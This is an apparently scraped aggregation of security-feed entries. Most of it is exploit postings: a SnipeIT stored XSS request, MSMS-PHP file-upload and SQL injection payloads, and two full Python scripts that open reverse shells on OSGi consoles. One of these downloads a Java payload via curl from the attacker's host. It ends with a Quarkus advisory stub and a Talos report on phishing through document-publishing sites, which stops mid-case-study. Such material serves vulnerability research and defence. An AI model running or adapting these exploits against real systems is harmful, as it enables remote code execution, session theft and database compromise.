SnipeIT version 6.2.1 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: SnipeIT 6.2.1 - Stored Cross Site ScriptingDate: 06-Oct-2023Exploit Author: Shahzaib Ali KhanVendor Homepage: https://snipeitapp.comSoftware Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1Version: 6.2.1Tested on: Windows 11 22H2 and Ubuntu 20.04CVE: CVE-2023-5452Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting(XSS) feature that allows attackers to execute JavaScript commands. Thelocation endpoint was vulnerable.Steps to Reproduce:1. Login as a standard user [non-admin] > Asset page > List All2. Click to open any asset > Edit Asset3. Create new location and add the payload:<script>alert(document.cookie)</script>4. Now login to any other non-admin or admin > Asset page > List All5. Open the same asset of which you can change the location and the payloadwill get executed.POC Request:POST /api/v1/locations HTTP/1.1Host: localhostContent-Length: 118Accept: */*X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGVX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://localhostReferer: http://localhost/hardware/196/editAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO;assetsListingTable.bs.table.cardView=false; laravel_token=eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNMd2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa001MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;XSRF-TOKEN=eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bHFWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3DConnection: closename=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country=Thanks,Shahzaib Ali Khan

SnipeIT 6.2.1 Cross Site Scripting

MSMS-PHP version 1.0 suffers from a remote shell upload vulnerability.

    ## Title: MSMS-PHP (by: oretnom23 ) v1.0 File Upload - RCE browser using## Author: nu11secur1ty## Date: 03/13/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/file-upload## Description:The upload function and id=cimg parameter are not sanitizing correctly!The attacker can upload any PHP file which he can execute directly onthe server!STATUS: HIGH-CrITICAL Vulnerability[+]Payload:```POSTPOST /mobile_store/classes/SystemSettings.php?f=update_settings HTTP/1.1Host: localhostContent-Length: 6318sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarypV7nBYU4nAonvWelX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/mobile_store/admin/?page=system_infoAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=b6i4kegv7jonjlu44gtuo8i4dgConnection: close------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="name"Mobile Store Management System - PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="short_name"MSMS-PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="about_us"<p style="text-align: center; margin-right: 0px; margin-bottom: 0px;margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size:70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding:0px; clear: both; border-top: 0px; height: 1px; background-image:linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75),rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding:0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px-160px; padding: 0px; position: sticky; top: 20px; width: 160px;height: 10px; float: left; text-align: right; color: rgb(0, 0, 0);font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div id="bannerR"style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky;top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0,0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div class="boxed"style="margin: 10px 28.7969px; padding: 0px; clear: both; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size:14px; text-align: center; background-color: rgb(255, 255, 255);"><divid="lipsum" style="margin: 0px; padding: 0px; text-align:justify;"></div></div></div><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsumdolor sit amet, consectetur adipiscing elit. Nullam non ultricestortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenasiaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blanditvulputate magna, non lobortis velit pharetra vel. Morbi sollicitudinlorem sed augue suscipit, eu commodo tortor vulputate. Interdum etmalesuada fames ac ante ipsum primis in faucibus. Pellentesquehabitant morbi tristique senectus et netus et malesuada fames acturpis egestas. Praesent eleifend interdum est, at gravida eratmolestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabituret viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamusporttitor ac risus eu ultricies. Morbi malesuada mi vel luctussagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris atlacus vehicula, aliquam purus quis, pharetra lorem.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Proin consectetur massa ut quam molestie porta. Donecsit amet ligula odio. Class aptent taciti sociosqu ad litora torquentper conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinarac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eublandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifendid, aliquet ut libero. Nunc scelerisque vulputate turpis quisvolutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulumimperdiet, nulla vitae pharetra pretium, magna felis placerat libero,quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorpercursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapienconsectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitaetortor vestibulum consequat ac quis risus. Sed finibus pharetra orci,id vehicula tellus eleifend sit amet.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Morbi id antevel velit mollis egestas. Suspendisse pretium sem urna, vitae placeratturpis cursus faucibus. Ut dignissim molestie blandit. Phaselluspulvinar, eros id ultricies mollis, lectus velit viverra mi, atvenenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibhfelis. Donec faucibus, nulla at faucibus blandit, mi justo efficiturdui, non mattis nisl purus non lacus. Maecenas vel congue tellus, inconvallis nisi. Curabitur faucibus interdum massa, eu facilisis ligulapretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis felis idcursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elitultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies nonlorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, atpharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada,vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, intincidunt mi. Aliquam sodales aliquam felis, eget tristique felisdictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesquemauris. Quisque sit amet varius augue.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sed quisimperdiet est. Donec lobortis tortor id neque tempus, vel faucibuslorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristiquenunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitaenisi. Curabitur at quam ut libero convallis mattis vel eget mauris.Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximusnulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrumnon magna at, molestie gravida magna. Aenean neque sapien, volutpat aullamcorper nec, iaculis quis est.</p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="privacy_policy"<p>Sample Privacy Policy<br></p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="img"; filename="info.php"Content-Type: application/octet-stream<?php  phpinfo();?>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="cover"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="banners[]"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWel--```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0/FU)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-file-upload.html)## Time spent:00:05:00

MSMS-PHP 1.0 Shell Upload

MSMS-PHP version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: MSMS-PHP (by: oretnom23 ) v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 03/13/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:This issue was generated by the BCheck: puncher_SQLi_bypass_authentication.There is a change in response when nu11secur1ty' or 1=1# is injected.Potential SQLi detected. Please confirm it manually after you checkthe POST, GET, or other requests... The payload from thepuncher_SQLi_bypass_authentication module was submitted successfullyafter the test. The `search` parameter is vulnerable for Multiple SQLiattacks. The attacker can get all information from the system by usingthis vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: search (GET)    Type: error-based    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)    Payload: p=products&search=-9068') OR 1 GROUP BYCONCAT(0x716b717671,(SELECT (CASE WHEN (4449=4449) THEN 1 ELSE 0END)),0x71706b7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#    Type: UNION query    Title: MySQL UNION query (random number) - 9 columns    Payload: p=products&search=-7515') UNION ALL SELECT2313,2313,2313,2313,CONCAT(0x716b717671,0x6e73537a656d74516c6d6751704b58725771474449755548546a50537054586f6656546a78447941,0x71706b7a71),2313,2313,2313,2313#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-multiple-sqli.html)## Time spend:00:15:00

MSMS-PHP 1.0 SQL Injection

OSGi versions 3.7.2 and below suffer from a remote code execution vulnerability.

    #!/usr/bin/python# Exploit Title: [OSGi v3.7.2 Console RCE]# Date: [2023-07-28]# Exploit Author: [Andrzej Olchawa, Milenko Starcik,#                  VisionSpace Technologies GmbH]# Exploit Repository:#           [https://github.com/visionspacetec/offsec-osgi-exploits.git]# Vendor Homepage: [https://eclipse.dev/equinox]# Software Link: [https://archive.eclipse.org/equinox/]# Version: [3.7.2 and before]# Tested on: [Linux kali 6.3.0-kali1-amd64]# License: [MIT]## Usage:# python exploit.py --help## Examples:# python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \#   --lport=4444## python exploit.py --rhost=localhost --rport=1337 --payload= \#   "curl http://192.168.100.100/osgi_test""""This is an exploit that allows to open a reverse shell connection fromthe system running OSGi v3.7.2 and earlier."""import argparseimport base64import socketdef parse():    """    This fnction is used to parse and return command-line arguments.    """    parser = argparse.ArgumentParser(        prog="OSGi-3.7.2-console-RCE",        description="This tool will let you open a reverse shell from the "                    "system that is running OSGi with the '-console' "                    "option in version 3.7.2 (or before).",        epilog="Happy Hacking! :)",    )    parser.add_argument("--rhost", dest="rhost",                        help="remote host", type=str, required=True)    parser.add_argument("--rport", dest="rport",                        help="remote port", type=int, required=True)    parser.add_argument("--lhost", dest="lhost",                        help="local host", type=str, required=False)    parser.add_argument("--lport", dest="lport",                        help="local port", type=int, required=False)    parser.add_argument("--payload", dest="custom_payload",                        help="custom payload", type=str, required=False)    parser.add_argument("--version", action="version",                        version="%(prog)s 0.1.0")    args = parser.parse_args()    if args.custom_payload and (args.lhost or args.lport):        parser.error(            "either --payload or both --lport and --rport are required.")    return argsdef generate_payload(lhost, lport, custom_payload):    """    This function generates the whole payload ready for the delivery.    """    payload = ""    if custom_payload:        payload = custom_payload        print("(*) Using custom payload.")    elif lhost and lport:        payload = \            "echo 'import java.io.IOException;import java.io.InputStream;" \            "import java.io.OutputStream;import java.net.Socket;class Rev" \            "Shell {public static void main(String[] args) throws Excepti" \            "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \            "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \            ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \            "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \            "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \            ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \            "e(pe.available()>0)so.write(pe.read());while(si.available()>" \            "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \            ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \            ");s.close();}}' > RevShell.java ; java ./RevShell.java" % (                lhost, lport)        print("(+) Using Java reverse shell payload.")    bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % (        base64.b64encode(payload.encode()))    wrapped_payload = b"fork \"%s\"\n" % (bash_payload)    return wrapped_payloaddef deliver_payload(rhost, rport, payload):    """    This function connects to the target host and delivers the payload.    It returns True if successful; False otherwise.    """    print("(*) Sending payload...")    try:        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        sock.connect((rhost, rport))        sock.send(payload)        sock.close()    except socket.error as err:        print(f"(-) Could not deliver the payload to {rhost}:{rport}!")        print(err)        return False    return Truedef main(args):    """    Main function.    """    payload = generate_payload(args.lhost, args.lport, args.custom_payload)    success = deliver_payload(args.rhost, args.rport, payload)    if success:        print("(+) Done.")    else:        print("(-) Finished with errors.")if __name__ == "__main__":    main(parse())

OSGi 3.7.2 Remote Code Execution

OSGi versions 3.8 through 3.18 suffer from a remote code execution vulnerability.

    #!/usr/bin/python# Exploit Title: [OSGi v3.8-3.18 Console RCE]# Date: [2023-07-28]# Exploit Author: [Andrzej Olchawa, Milenko Starcik,#                  VisionSpace Technologies GmbH]# Exploit Repository:#           [https://github.com/visionspacetec/offsec-osgi-exploits.git]# Vendor Homepage: [https://eclipse.dev/equinox]# Software Link: [https://archive.eclipse.org/equinox/]# Version: [3.8 - 3.18]# Tested on: [Linux kali 6.3.0-kali1-amd64]# License: [MIT]## Usage:# python exploit.py --help## Example:# python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \#                                                      --lport=4444"""This is an exploit that allows to open a reverse shell connection fromthe system running OSGi v3.8-3.18 and earlier."""import argparseimport socketimport sysimport threadingfrom functools import partialfrom http.server import BaseHTTPRequestHandler, HTTPServer# Stage 1 of the handshake messageHANDSHAKE_STAGE_1 = \    b"\xff\xfd\x01\xff\xfd" \    b"\x03\xff\xfb\x1f\xff" \    b"\xfa\x1f\x00\x74\x00" \    b"\x37\xff\xf0\xff\xfb" \    b"\x18"# Stage 2 of the handshake messageHANDSHAKE_STAGE_2 = \    b"\xff\xfa\x18\x00\x58" \    b"\x54\x45\x52\x4d\x2d" \    b"\x32\x35\x36\x43\x4f" \    b"\x4c\x4f\x52\xff\xf0"# The buffer of this size is enough to handle the telnet handshakeBUFFER_SIZE = 2 * 1024class HandlerClass(BaseHTTPRequestHandler):    """    This class overrides the BaseHTTPRequestHandler. It provides a specific    functionality used to deliver a payload to the target host.    """    _lhost: str    _lport: int    def __init__(self, lhost, lport, *args, **kwargs):        self._lhost = lhost        self._lport = lport        super().__init__(*args, **kwargs)    def _set_response(self):        self.send_response(200)        self.send_header("Content-type", "text/html")        self.end_headers()    def do_GET(self):  # pylint: disable=C0103        """        This method is responsible for the playload delivery.        """        print("Delivering the payload...")        self._set_response()        self.wfile.write(generate_revshell_payload(            self._lhost, self._lport).encode('utf-8'))        raise KeyboardInterrupt    def log_message(self, format, *args):  # pylint: disable=W0622        """        This method redefines a built-in method to suppress        BaseHTTPRequestHandler log messages.        """        returndef generate_revshell_payload(lhost, lport):    """    This function generates the Revershe Shell payload that will    be executed on the target host.    """    payload = \        "import java.io.IOException;import java.io.InputStream;" \        "import java.io.OutputStream;import java.net.Socket;" \        "class RevShell {public static void main(String[] args) " \        "throws Exception { String host=\"%s\";int port=%d;" \        "String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \        "redirectErrorStream(true).start();Socket s=new Socket(host,port);" \        "InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \        "si=s.getInputStream();OutputStream po=p.getOutputStream()," \        "so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \        ">0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());" \        "while(si.available()>0)po.write(si.read());so.flush();po.flush();" \        "Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \        "p.destroy();s.close();}}\n" % (            lhost, lport)    return payloaddef run_payload_delivery(lhost, lport):    """    This function is responsible for payload delivery.    """    print("Setting up the HTTP server for payload delivery...")    handler_class = partial(HandlerClass, lhost, lport)    server_address = ('', 80)    httpd = HTTPServer(server_address, handler_class)    try:        print("[+] HTTP server is running.")        httpd.serve_forever()    except KeyboardInterrupt:        print("[+] Payload delivered.")    except Exception as err:  # pylint: disable=broad-except        print("[-] Failed payload delivery!")        print(err)    finally:        httpd.server_close()def generate_stage_1(lhost):    """    This function generates the stage 1 of the payload.    """    stage_1 = b"fork \"curl http://%s -o ./RevShell.java\"\n" % (        lhost.encode()    )    return stage_1def generate_stage_2():    """    This function generates the stage 2 of the payload.    """    stage_2 = b"fork \"java ./RevShell.java\"\n"    return stage_2def establish_connection(rhost, rport):    """    This function creates a socket and establishes the connection    to the target host.    """    print("[*] Connecting to OSGi Console...")    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    sock.connect((rhost, rport))    print("[+] Connected.")    return sockdef process_handshake(sock):    """    This function process the handshake with the target host.    """    print("[*] Processing the handshake...")    sock.recv(BUFFER_SIZE)    sock.send(HANDSHAKE_STAGE_1)    sock.recv(BUFFER_SIZE)    sock.send(HANDSHAKE_STAGE_2)    sock.recv(BUFFER_SIZE)    sock.recv(BUFFER_SIZE)def deliver_payload(sock, lhost):    """    This function executes the first stage of the exploitation.    It triggers the payload delivery mechanism to the target host.    """    stage_1 = generate_stage_1(lhost)    print("[*] Triggering the payload delivery...")    sock.send(stage_1)    sock.recv(BUFFER_SIZE)    sock.recv(BUFFER_SIZE)def execute_payload(sock):    """    This function executes the second stage of the exploitation.    It sends payload which is responsible for code execution.    """    stage_2 = generate_stage_2()    print("[*] Executing the payload...")    sock.send(stage_2)    sock.recv(BUFFER_SIZE)    sock.recv(BUFFER_SIZE)    print("[+] Payload executed.")def exploit(args, thread):    """    This function sends the multistaged payload to the tareget host.    """    try:        sock = establish_connection(args.rhost, args.rport)        process_handshake(sock)        deliver_payload(sock, args.lhost)        # Join the thread running the HTTP server        # and wait for payload delivery        thread.join()        execute_payload(sock)        sock.close()        print("[+] Done.")    except socket.error as err:        print("[-] Could not connect!")        print(err)        sys.exit()def parse():    """    This fnction is used to parse and return command-line arguments.    """    parser = argparse.ArgumentParser(        prog="OSGi-3.8-console-RCE",        description="This tool will let you open a reverse shell from the "                    "system that is running OSGi with the '-console' "                    "option in versions between 3.8 and 3.18.",        epilog="Happy Hacking! :)",    )    parser.add_argument("--rhost", dest="rhost",                        help="remote host", type=str, required=True)    parser.add_argument("--rport", dest="rport",                        help="remote port", type=int, required=True)    parser.add_argument("--lhost", dest="lhost",                        help="local host", type=str, required=False)    parser.add_argument("--lport", dest="lport",                        help="local port", type=int, required=False)    parser.add_argument("--version", action="version",                        version="%(prog)s 0.1.0")    return parser.parse_args()def main(args):    """    Main fuction.    """    thread = threading.Thread(        target=run_payload_delivery, args=(args.lhost, args.lport))    thread.start()    exploit(args, thread)if __name__ == "__main__":    main(parse())

OSGi 3.18 Remote Code Execution

A vulnerability was found in Quarkus. In certain conditions related to the CI process, git credentials could be inadvertently published, which could put the git repository at risk.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-1979

**In Quarkus, git credentials could be inadvertently published**

Low severity GitHub Reviewed Published Mar 13, 2024 to the GitHub Advisory Database • Updated Mar 13, 2024

**Package**

maven io.quarkus:quarkus-kubernetes-deployment (Maven)

**Affected versions**

< 3.7.3

**Description**

Published to the GitHub Advisory Database

Mar 13, 2024

Last updated

Mar 13, 2024

GHSA-7g97-7r3c-5cc6: In Quarkus, git credentials could be inadvertently published

Talos IR has responded to several recent incidents in which threat actors used legitimate digital document publishing sites such as Publuu and Marq to host phishing documents as part of ongoing credential and session harvesting attacks.

Wednesday, March 13, 2024 08:00

*   Cisco Talos Incident Response (Talos IR) has observed the ongoing use of legitimate digital document publishing (DDP) sites for phishing, credential theft and session token theft during recent incident response and threat intelligence engagements.
*   Hosting phishing lures on DDP sites increases the likelihood of a successful phishing attack, since these sites often have a favorable reputation, are unlikely to appear on web filter blocklists, and may instill a false sense of security in users who recognize them as familiar or legitimate.
*   DDP sites allow adversaries to quickly deploy and decommission malicious documents on a single platform. Talos IR also observed an adversary move between DDP sites within a short period.

Talos IR has responded to several recent incidents in which threat actors used legitimate digital document publishing sites such as Publuu and Marq to host phishing documents as part of ongoing credential and session harvesting attacks. Threat actors have used a similar tactic of deploying phishing lures on well-known cloud storage and contract management sites such as Google Drive, OneDrive, SharePoint, DocuSign and Oneflow. However, DDP sites could represent a blind spot for defenders, because they are unfamiliar to trained users and unlikely to be flagged by email and web content filtering controls. Recent malicious activity observed across these platforms underscores the need for security teams to ensure that phishing protections and user awareness training programs consider these and similar sites.

**Background and observations**

 “Digital Document Publishing sites” refers to websites that allow users to upload and share PDF files in a browser-based flipbook format. Visitors can view an entire PDF by flipping from page to page without downloading the document, and some DDP sites offer features that allow other types of interaction with the document. Examples of DDP sites include Publuu, Marq, FlipSnack, Issuu, FlippingBook, RelayTo and SimpleBooklet.

The sites discussed in this blog are not malicious. Rather, they are being abused by threat actors.

**Delivery mechanism**

Threat actors integrate DDP sites as a secondary or intermediate stage of the attack chain, which follows tried-and-true phishing methods.

*   The victim receives an email containing a link to a document hosted on a legitimate DDP site. The email’s subject and/or body often includes the phrase “New Document from \[sender organization\],” and leaves the “To” header blank. Instead, the actors load the target list into the “BCC” field.
*   The DDP-hosted document includes a link to an external, adversary-controlled site.
*   When clicked, the link either moves the victim directly to the adversary-controlled site, or through a series of redirects. Talos IR also observed the inclusion of Cloudflare CAPTCHAs as part of some redirects, an adversary technique reported by Cofense, Netskope and other security teams over the past six months.
*   The victim arrives at the adversary-controlled site, which mimics a legitimate authentication page and is designed to capture user credentials or session tokens during authentication.

Attacks leveraging DDP sites for credential and session token theft often take place through unauthorized access to another legitimate email inbox. In a sort of “cascading” business email compromise (BEC) process, the threat actor creates infrastructure and phishing lures to target a specific victim, then leverages that victim’s established connections to conduct follow-on attacks against other organizations. A portion of the infrastructure created for the original target may be reused, while other portions are recreated to increase the likelihood of success during the subsequent attacks. 

**Lure customization**

DDP sites offer custom capabilities that lend credence to a phishing attack. Not only can the threat actor customize the uploaded phishing document, the web page hosting that document can also be modified. Page customization options include changing the background, banner, border or HTML Title tag. These quick configurations create more convincing lures and are likely to garner a higher click-through rate to the credential harvesting page. 

DDP-hosted lure customization observed during investigation ranged from pages listing the organization name only in the HTML Title tag, to a highly customized lure and landing page combination targeting users of a Canadian telecom provider. In the latter case, the final credential harvesting page was a near replica of the provider’s legitimate user login page, though it was hosted on an unrelated webwave\[.\]dev subdomain. 

**Historical trends**

Expanding the scope of the investigation to include historical data reveals a possible trend where threat actors migrate between DDP sites or rapidly activate and deactivate similar campaigns on the same site over time. For example, Talos IR observed a cluster of activity on SimpleBooklet from late October to early November 2020, and another on RelayTo in early September 2023. More recently, an adversary was observed operating the same credential-harvesting attack, first on Publuu, then later Issuu. 

**Adversary advantages create challenges for defenders**

DDP sites create advantages for threat actors seeking to thwart contemporary phishing protections. The same features and benefits that attract legitimate users to these sites can be abused by threat actors to increase the efficacy of a phishing attack. Given some of these advantages, threat actors may find DDP sites as useful as creating spoofed domains or compromising legitimate sites for phishing and credential theft.

**DDP sites offer low-cost, transient file hosting**

Many DDP sites offer either a free tier or a no-cost trial period where a defined number of files can be published for a limited time. No-cost trial periods usually require only limited personal identifiers and no payment methods. Threat actors can quickly and easily create multiple free accounts, with a varying number of malicious pages per account.

Some DDP sites also allow a link expiration to be set for published content. This feature creates a “set it and forget it” capability for threat actors, who are no longer required to closely track where phishing documents have been deployed so they can be decommissioned. Instead, a link expiration date and time is configured during page creation, ensuring the content will be rendered unavailable automatically, usually after only a short time.

Talos IR observed instances where an adversary launched, then disabled a DDP page in fewer than 24 hours, and others where the DDP page was left active but the final landing page on the adversary-controlled domain was removed through DNS fast fluxing or another mechanism.

This transient nature of DDP pages creates challenges for security teams and complicates the incident response process. While it’s possible to detect, create internal alerts for, and/or notify security personnel about a DDP-hosted lure, the brief availability of the pages creates a compressed response time for defenders. Understanding the theme of the lure, the associated adversary-controlled domains, and the intent of the attack in such a short time may be difficult, even for experienced security teams.

**DDP sites usually have a favorable web reputation.**

The ratio of legitimate to compromised pages hosted on DDP sites is likely quite low. While that ratio seemed to vary by DDP provider, Talos IR found that most pages created recently across all DDP sites hosted legitimate content. Unless this trend continues to shift toward hosting greater volumes of malicious content, these sites will maintain a favorable reputation score and are less likely to be included in automated blocklists. 

A favorable web reputation score may also mislead users who investigate the DDP site using popular open-source intelligence tools or a basic internet search, leading to higher click and credential capture rates than sites with an unknown or poor reputation.

**Site**

**Domain Registration**

**Umbrella Unique Visitors Score\***

**Umbrella Reputation Score\*\***

**Publuu**

2019-02-28 (IS)

63

53 (Medium Risk)

**Marq**

2004-06-19 (IS)

76

9 (Low Risk)

**FlipSnack**

2010-06-03 (US)

96

11 (Low Risk)

**Issuu**

2007-04-19 (GB)

100

9 (Low Risk)

**RelayTo**

2013-12-02 (US)

53

58 (Medium Risk)

_\* Umbrella’s Unique Visitors Score is included to illustrate estimated traffic volume per site as of Feb. 2, 2024._

_\*\* Reputation Score as of Feb. 2, 2024._

**DDP productivity features may inhibit malicious link detection.**

Talos IR found that productivity features on at least one DDP site inhibited traditional methods of extracting the true URL from a phishing link. During the investigation of a malicious document hosted on Publuu, a custom sub-menu was displayed when the user right-clicked on the URL. While this sub-menu included options that would benefit legitimate users, it did not provide a clear option to copy the URL behind the “View Online PDF” hyperlink. Further, no tooltip popups appeared to show the URL when hovering over the link. 

**Case studies**

Two recent Talos IR engagements involved the use of a DDP site as part of potential credential and session token-harvesting attacks.

**Publuu**

Several individuals at the targeted organization received phishing emails from a compromised email address belonging to a trusted third-party vendor with the subject, “New Document from \[third-party vendor\]”.

